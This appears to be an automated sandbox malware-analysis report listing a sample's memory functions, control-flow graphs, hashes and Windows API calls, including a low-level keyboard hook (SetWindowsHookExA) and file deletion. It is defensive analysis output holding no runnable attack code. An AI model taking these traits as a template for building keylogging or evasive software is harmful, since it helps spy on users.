                                            control_flow_graph 1218 569fe23-569fe72 1221 569fe7e-569feb0 SetWindowsHookExA 1218->1221 1222 569fe74-569fe7c 1218->1222 1223 569feb9-569fed9 1221->1223 1224 569feb2-569feb8 1221->1224 1222->1221 1224->1223
                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0569FC90,00000000,00000000), ref: 0569FEA3
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 594ba854acb6cb456bca0eda0a9de40c7a9c3fc30c295d4ae9129e7fde2f855a
                                            • Instruction ID: b155fcc5a1807e168b137172765d94ef1912bb6b780ceba30b8f66e0ed070587
                                            • Opcode Fuzzy Hash: 594ba854acb6cb456bca0eda0a9de40c7a9c3fc30c295d4ae9129e7fde2f855a
                                            • Instruction Fuzzy Hash: 842118B19042199FCB14DF9AC844BEEFBF9FF88320F108429E459A7250C775A944CFA5
                                            Function 00E57258 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1238 e57258-e572a2 1240 e572a4-e572a7 1238->1240 1241 e572aa-e572d5 DeleteFileW 1238->1241 1240->1241 1242 e572d7-e572dd 1241->1242 1243 e572de-e57306 1241->1243 1242->1243
                                            APIs
                                            • DeleteFileW.KERNELBASE(00000000), ref: 00E572C8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4138513589.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_e50000_26.jbxd
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: ea25a0896c65c6781e4edc4192f3faaae3ad6da8efdc7dabce627e3afc4c9f91
                                            • Instruction ID: 0e259085bd31250c8d58d9d3ccf893c6e7d21ea591989eb93f9dabd424ee05eb
                                            • Opcode Fuzzy Hash: ea25a0896c65c6781e4edc4192f3faaae3ad6da8efdc7dabce627e3afc4c9f91
                                            • Instruction Fuzzy Hash: 4F1147B5C0061A9BCB10CF9AD5447DEFBF4EF48320F10852AE858B7250D378A944CFA5
                                            Function 05695E1C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 05697956
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 19b3ee1820805847a2306a9c97a5135e3a8a98625741ee27c1e9ee9034b64906
                                            • Instruction ID: 4c14ed1f19fe64db80cd00f96943c2f5f0ca5e7ace463a26a61ef67144a5717e
                                            • Opcode Fuzzy Hash: 19b3ee1820805847a2306a9c97a5135e3a8a98625741ee27c1e9ee9034b64906
                                            • Instruction Fuzzy Hash: 60113FB1C0034A8FCB14DF9AC444ADEFBF8EB89220F10802AD869B7710C375A545CFA4
                                            Function 056978EB Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 05697956
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: b40f12261e6d05a7437765465463009be99d5c07aeee3971c50f6a7fe5f6017f
                                            • Instruction ID: e02de406c2f7d2d2020d41eab676010d92d82f981a0968de284e38546370967c
                                            • Opcode Fuzzy Hash: b40f12261e6d05a7437765465463009be99d5c07aeee3971c50f6a7fe5f6017f
                                            • Instruction Fuzzy Hash: 46110FB5C002498FCB14DF9AD844ADEFBF8EB89324F10842AD869B7710C375A545CFA5
                                            Function 0569E189 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0569E1E5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: eefbf1662a60984ddc71b65d152fbd852d51faa49e5cfb6e7585406e651b5988
                                            • Instruction ID: d6d16f6c2685f4949b6b3f7a7ff358a9e8dbef35d1f4a3d7796068120e77429a
                                            • Opcode Fuzzy Hash: eefbf1662a60984ddc71b65d152fbd852d51faa49e5cfb6e7585406e651b5988
                                            • Instruction Fuzzy Hash: 7F1136B08043898FCB20DFAAC448BDEFFF8EB49324F248459D599A7611C375A940CFA4
                                            Function 0569C304 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0569D89D), ref: 0569D927
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 8568d45773ed81dc3b7b95a9cb797965106109813643554a151e693dd445d523
                                            • Instruction ID: 0a2d57571246308f0311881ce9a478fa8ec91ead1ad078d2cbc76c2e007b9a5c
                                            • Opcode Fuzzy Hash: 8568d45773ed81dc3b7b95a9cb797965106109813643554a151e693dd445d523
                                            • Instruction Fuzzy Hash: 631130B1800249CFCB20EF9AD484BDEFBF8EB48324F20842AD559A7250C775A940CFA4
                                            Function 0569D8C0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0569D89D), ref: 0569D927
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 8ef007f47ae75ef3716e1c6ec6660ffa3bb04080ba3cd2d192d4bcb385d9f601
                                            • Instruction ID: 0ade0fe5e8b86f6c51e70b508d4484225c4fac2e5110db6f8e80fadf87705d1b
                                            • Opcode Fuzzy Hash: 8ef007f47ae75ef3716e1c6ec6660ffa3bb04080ba3cd2d192d4bcb385d9f601
                                            • Instruction Fuzzy Hash: B21145B5800249CFCB10DF9AD444BDEFFF8EB49324F20846AD559A7210C375A980CFA5
                                            Function 0569DBAD Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0569E1E5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: fcb67b37704e529838179fff8834f00711a540c22b64560370dd970c0ca14784
                                            • Instruction ID: e6e4dcec64c9d744c998554d2cb6f86ec7821e0cf43b465537c080f9e711c3e5
                                            • Opcode Fuzzy Hash: fcb67b37704e529838179fff8834f00711a540c22b64560370dd970c0ca14784
                                            • Instruction Fuzzy Hash: 461103B5900358CFCB10DF9AD548BDEBBF8EB48324F208419E559A7710C375A944CFA5
                                            Function 0569DBB0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0569E1E5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4146376795.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5690000_26.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 63a1e95c052389f07cdf780dd2438f62987a917e5c48dc943fd1f06f67b7365a
                                            • Instruction ID: 6bf58eaf6980998c0c1fb9443d6472e0fea47fe7f18ff966b35a3d35562c6192
                                            • Opcode Fuzzy Hash: 63a1e95c052389f07cdf780dd2438f62987a917e5c48dc943fd1f06f67b7365a
                                            • Instruction Fuzzy Hash: 4E1133B0800348CFCB20DF9AC448BDEBBF8EB48324F108419E519A7610C375A940CFA4
                                            Function 00DED01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4137193545.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_ded000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60f66ee3a086ee40ea91bf7a1205a22ece65f51911c7cf7087a8a5cafb8c5da8
                                            • Instruction ID: 268e2ed1f6914781503a202e08eca91a83b99ffd08661f429e311e454bfc37b9
                                            • Opcode Fuzzy Hash: 60f66ee3a086ee40ea91bf7a1205a22ece65f51911c7cf7087a8a5cafb8c5da8
                                            • Instruction Fuzzy Hash: 0621F271604280DFCB14EF15D984B26BBA6FB84314F28C569E84A4B296CB3AD847CA71
                                            Function 00DED104 Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4137193545.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_ded000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5850ebbf89bee6f14f5b73b47789e3e0acf9c70ae3df8e841230ecf25641481
                                            • Instruction ID: e8a34a0a73b9d2639a9344197f57cea3ebf37a4b5a7612005d4a1f4ad1e38058
                                            • Opcode Fuzzy Hash: a5850ebbf89bee6f14f5b73b47789e3e0acf9c70ae3df8e841230ecf25641481
                                            • Instruction Fuzzy Hash: 0921F271504384EFDB04EF14CAC4B26BBA6EB94318F24C66DE9494B255CB3AD846C671
                                            Function 00DED005 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4137193545.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_ded000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b2eaf60a358a1bccf55cadfe03702151b725111d50d13a579937db72dd96b73
                                            • Instruction ID: 543c8db8f59f5abded5555657df3c4dc7e25761069327819ba6ebe8dff1280f3
                                            • Opcode Fuzzy Hash: 7b2eaf60a358a1bccf55cadfe03702151b725111d50d13a579937db72dd96b73
                                            • Instruction Fuzzy Hash: 71215E755093C08FDB12DF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                            Function 00DED0FF Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4137193545.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_ded000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                            • Instruction ID: 490b41f79f13e565c504148b0cf180399e1995263089ca1c803f8a7b26dee565
                                            • Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                            • Instruction Fuzzy Hash: 5511DD75504380CFDB05DF10C9C4B15BFA2FB94318F28C6ADD8094B656C33AD84ACB61

                                            Execution Graph

                                            Execution Coverage:8.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:54
                                            Total number of Limit Nodes:6
                                            execution_graph 19081 143d340 19082 143d386 GetCurrentProcess 19081->19082 19084 143d3d8 GetCurrentThread 19082->19084 19086 143d3d1 19082->19086 19085 143d415 GetCurrentProcess 19084->19085 19088 143d40e 19084->19088 19087 143d44b 19085->19087 19086->19084 19089 143d473 GetCurrentThreadId 19087->19089 19088->19085 19090 143d4a4 19089->19090 19116 143afb0 19120 143b097 19116->19120 19125 143b0a8 19116->19125 19117 143afbf 19121 143b0a8 19120->19121 19122 143b0dc 19121->19122 19123 143b2e0 GetModuleHandleW 19121->19123 19122->19117 19124 143b30d 19123->19124 19124->19117 19127 143b0a9 19125->19127 19126 143b0dc 19126->19117 19127->19126 19128 143b2e0 GetModuleHandleW 19127->19128 19129 143b30d 19128->19129 19129->19117 19130 76e1c98 19131 76e1cb6 19130->19131 19132 76e1e23 19131->19132 19136 76e1f18 19131->19136 19139 76e1f10 19131->19139 19143 76e1fd7 19131->19143 19137 76e1f5a PostMessageW 19136->19137 19138 76e1f84 19137->19138 19138->19131 19140 76e1f15 PostMessageW 19139->19140 19142 76e1f84 19140->19142 19142->19131 19144 76e1f5a PostMessageW 19143->19144 19145 76e1fbc 19143->19145 19146 76e1f84 19144->19146 19145->19143 19147 76e1fdc 19145->19147 19146->19131 19091 1434668 19092 143467a 19091->19092 19093 1434686 19092->19093 19095 1434779 19092->19095 19096 143479d 19095->19096 19100 1434879 19096->19100 19104 1434888 19096->19104 19102 14348af 19100->19102 19101 143498c 19101->19101 19102->19101 19108 14344b4 19102->19108 19106 14348af 19104->19106 19105 143498c 19105->19105 19106->19105 19107 14344b4 CreateActCtxA 19106->19107 19107->19105 19109 1435918 CreateActCtxA 19108->19109 19111 14359db 19109->19111 19112 143d588 DuplicateHandle 19113 143d61e 19112->19113 19114 76e4200 CloseHandle 19115 76e4267 19114->19115

                                            Executed Functions

                                            Function 0143D331 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 296 143d331-143d3cf GetCurrentProcess 300 143d3d1-143d3d7 296->300 301 143d3d8-143d40c GetCurrentThread 296->301 300->301 302 143d415-143d449 GetCurrentProcess 301->302 303 143d40e-143d414 301->303 305 143d452-143d46d call 143d50f 302->305 306 143d44b-143d451 302->306 303->302 309 143d473-143d4a2 GetCurrentThreadId 305->309 306->305 310 143d4a4-143d4aa 309->310 311 143d4ab-143d50d 309->311 310->311
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0143D3BE
                                            • GetCurrentThread.KERNEL32 ref: 0143D3FB
                                            • GetCurrentProcess.KERNEL32 ref: 0143D438
                                            • GetCurrentThreadId.KERNEL32 ref: 0143D491
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 708ed02d86c9fb1b4aad223d65c2c349da2ad4bdd3105914241099d30c706768
                                            • Instruction ID: 0d34462d6c76321b66c485af8ce1ed0166f08bc8fce8f80de62ef3a63f143d9c
                                            • Opcode Fuzzy Hash: 708ed02d86c9fb1b4aad223d65c2c349da2ad4bdd3105914241099d30c706768
                                            • Instruction Fuzzy Hash: 4A5133B0D012498FDB14DFA9D548BDEBBF5AB88314F20C46AD059A7360D734A984CF66
                                            Function 0143D340 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 318 143d340-143d3cf GetCurrentProcess 322 143d3d1-143d3d7 318->322 323 143d3d8-143d40c GetCurrentThread 318->323 322->323 324 143d415-143d449 GetCurrentProcess 323->324 325 143d40e-143d414 323->325 327 143d452-143d46d call 143d50f 324->327 328 143d44b-143d451 324->328 325->324 331 143d473-143d4a2 GetCurrentThreadId 327->331 328->327 332 143d4a4-143d4aa 331->332 333 143d4ab-143d50d 331->333 332->333
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0143D3BE
                                            • GetCurrentThread.KERNEL32 ref: 0143D3FB
                                            • GetCurrentProcess.KERNEL32 ref: 0143D438
                                            • GetCurrentThreadId.KERNEL32 ref: 0143D491
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 4047fd32e6a203ada3bfa8e86e68c5337e49ddb9b450cdf65d8d2adcfed95f39
                                            • Instruction ID: 620dcf0b606ccefc9cd6e3f272edfdbbd7187cbcd98857142613b1bd6fafa478
                                            • Opcode Fuzzy Hash: 4047fd32e6a203ada3bfa8e86e68c5337e49ddb9b450cdf65d8d2adcfed95f39
                                            • Instruction Fuzzy Hash: B95123B0D012498FDB14DFAAD548BDEBBF5EB88314F20C46AD059A7360DB34A984CF65
                                            Function 0143B0A8 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 363 143b0a8-143b0b7 365 143b0e3-143b0e7 363->365 366 143b0b9-143b0c6 call 1439b14 363->366 367 143b0fb-143b13c 365->367 368 143b0e9-143b0f3 365->368 373 143b0c8 366->373 374 143b0dc 366->374 375 143b149-143b157 367->375 376 143b13e-143b146 367->376 368->367 419 143b0ce call 143b331 373->419 420 143b0ce call 143b340 373->420 374->365 377 143b17b-143b17d 375->377 378 143b159-143b15e 375->378 376->375 380 143b180-143b187 377->380 381 143b160-143b167 call 143ad10 378->381 382 143b169 378->382 379 143b0d4-143b0d6 379->374 383 143b218-143b2d8 379->383 386 143b194-143b19b 380->386 387 143b189-143b191 380->387 384 143b16b-143b179 381->384 382->384 414 143b2e0-143b30b GetModuleHandleW 383->414 415 143b2da-143b2dd 383->415 384->380 388 143b1a8-143b1b1 call 143ad20 386->388 389 143b19d-143b1a5 386->389 387->386 395 143b1b3-143b1bb 388->395 396 143b1be-143b1c3 388->396 389->388 395->396 397 143b1e1-143b1ee 396->397 398 143b1c5-143b1cc 396->398 404 143b211-143b217 397->404 405 143b1f0-143b20e 397->405 398->397 400 143b1ce-143b1de call 143ad30 call 143ad40 398->400 400->397 405->404 416 143b314-143b328 414->416 417 143b30d-143b313 414->417 415->414 417->416 419->379 420->379
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0143B2FE
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 41a6013362e29ae4eba5bddaa6cd8c3b97aa926bf85a9873f00ba45646b93c84
                                            • Instruction ID: 10a17cd4f0fb740fb00814193d9b3fe6ea937277f557a161f4421f5640af91b5
                                            • Opcode Fuzzy Hash: 41a6013362e29ae4eba5bddaa6cd8c3b97aa926bf85a9873f00ba45646b93c84
                                            • Instruction Fuzzy Hash: 27711270A00B058FDB24DF6AD44479BBBF1FB88204F108A2ED49AD7B60D775E946CB90
                                            Function 0143590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 421 143590c-14359d9 CreateActCtxA 423 14359e2-1435a3c 421->423 424 14359db-14359e1 421->424 431 1435a4b-1435a4f 423->431 432 1435a3e-1435a41 423->432 424->423 433 1435a51-1435a5d 431->433 434 1435a60 431->434 432->431 433->434 436 1435a61 434->436 436->436
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 014359C9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 7a1c27af93dc55c00327d739597c0c0cd542ce9f58ccbd76db09f79cfee0c165
                                            • Instruction ID: 877d0e33fda39fcbb77cd7651414e28f0179729b858df3eb3d0ab1854cb03099
                                            • Opcode Fuzzy Hash: 7a1c27af93dc55c00327d739597c0c0cd542ce9f58ccbd76db09f79cfee0c165
                                            • Instruction Fuzzy Hash: 8C41D2B1C00719CEDB24DFA9C884BDEBBF5BF89304F24806AD418AB265DB755946CF90
                                            Function 014344B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 437 14344b4-14359d9 CreateActCtxA 440 14359e2-1435a3c 437->440 441 14359db-14359e1 437->441 448 1435a4b-1435a4f 440->448 449 1435a3e-1435a41 440->449 441->440 450 1435a51-1435a5d 448->450 451 1435a60 448->451 449->448 450->451 453 1435a61 451->453 453->453
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 014359C9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 8e3acc9c6ac76a7a09067b67943ca00113dc51192b06c76ea8220af65db668c8
                                            • Instruction ID: c86e983bdcc7940cc9de99011daa70f1a0ec023cc0f33a23052567eb1103e769
                                            • Opcode Fuzzy Hash: 8e3acc9c6ac76a7a09067b67943ca00113dc51192b06c76ea8220af65db668c8
                                            • Instruction Fuzzy Hash: E941D2B1C0071DCBDB24DFA9C84479EBBF5BF89304F24806AD418AB265DB756946CF90
                                            Function 076E1FD7 Relevance: 1.6, APIs: 1, Instructions: 67windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 454 76e1fd7-76e1fd8 455 76e1f5a-76e1f82 PostMessageW 454->455 456 76e1fd9-76e1fda 454->456 457 76e1f8b-76e1f9f 455->457 458 76e1f84-76e1f8a 455->458 459 76e1fbc-76e1fd6 456->459 460 76e1fdc-76e1fdd 456->460 458->457 459->454 461 76e1fdf-76e1fe1 460->461 462 76e1fe4-76e1ff7 460->462 461->462 466 76e2008-76e2023 462->466 467 76e1ff9-76e2006 462->467 470 76e202d 466->470 471 76e2025 466->471 467->466 472 76e202e 470->472 471->470 472->472
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 076E1F75
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 655676cdb631fdfa7375788779c6bf2bcb1564fb0fb17a2de687968f61471724
                                            • Instruction ID: ce4879af647faec3753219d1131436b3392cf6cb03bc8ebb96496fe0e41e7ff3
                                            • Opcode Fuzzy Hash: 655676cdb631fdfa7375788779c6bf2bcb1564fb0fb17a2de687968f61471724
                                            • Instruction Fuzzy Hash: 9B21D9B1D0221A8EDF20DFA9C8187EEBBF8AF49300F18841AD542B7290C7795944CBE0
                                            Function 0143D581 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 473 143d581-143d61c DuplicateHandle 474 143d625-143d642 473->474 475 143d61e-143d624 473->475 475->474
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0143D60F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 5e12d7a9033a4a07357b1e45014ed801cc30c252c51be9880df0c0106878ff1e
                                            • Instruction ID: 7b506cf90ef7dba0f5b632b8770bb031949590149a7b1f48dc787daa473a8b33
                                            • Opcode Fuzzy Hash: 5e12d7a9033a4a07357b1e45014ed801cc30c252c51be9880df0c0106878ff1e
                                            • Instruction Fuzzy Hash: D521E4B5D00249DFDB10CF99D984ADEBFF5EB48310F14841AE918A3310D378A954CF65
                                            Function 0143D588 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 478 143d588-143d61c DuplicateHandle 479 143d625-143d642 478->479 480 143d61e-143d624 478->480 480->479
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0143D60F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 906f916c6b021168128558432ae74511e3ad7fb5a9e476eaadbba2e51675e8d4
                                            • Instruction ID: c72ba4013500dc5e7bd7108b5b86675177c17e341c85fce834fb14ede585a8c1
                                            • Opcode Fuzzy Hash: 906f916c6b021168128558432ae74511e3ad7fb5a9e476eaadbba2e51675e8d4
                                            • Instruction Fuzzy Hash: 4821E4B5D002089FDB10CF9AD984ADEBFF8EB48310F14841AE918A3310D378A944CFA4
                                            Function 0143B298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 483 143b298-143b2d8 484 143b2e0-143b30b GetModuleHandleW 483->484 485 143b2da-143b2dd 483->485 486 143b314-143b328 484->486 487 143b30d-143b313 484->487 485->484 487->486
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0143B2FE
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1830115456.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1430000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: ed8beb472f873db67609d322c8b878f59ac50dee16363fa34ac7a37070d343ae
                                            • Instruction ID: 1d6fd041558eaf5f151e5598a33f8ffb76a2196ce615d28704da5a66588a7903
                                            • Opcode Fuzzy Hash: ed8beb472f873db67609d322c8b878f59ac50dee16363fa34ac7a37070d343ae
                                            • Instruction Fuzzy Hash: E8110FB5C002498FDB10CF9AC844BDEFBF8EB88324F10842AD829A7210C379A545CFA5
                                            Function 076E1F18 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 495 76e1f18-76e1f82 PostMessageW 497 76e1f8b-76e1f9f 495->497 498 76e1f84-76e1f8a 495->498 498->497
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 076E1F75
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
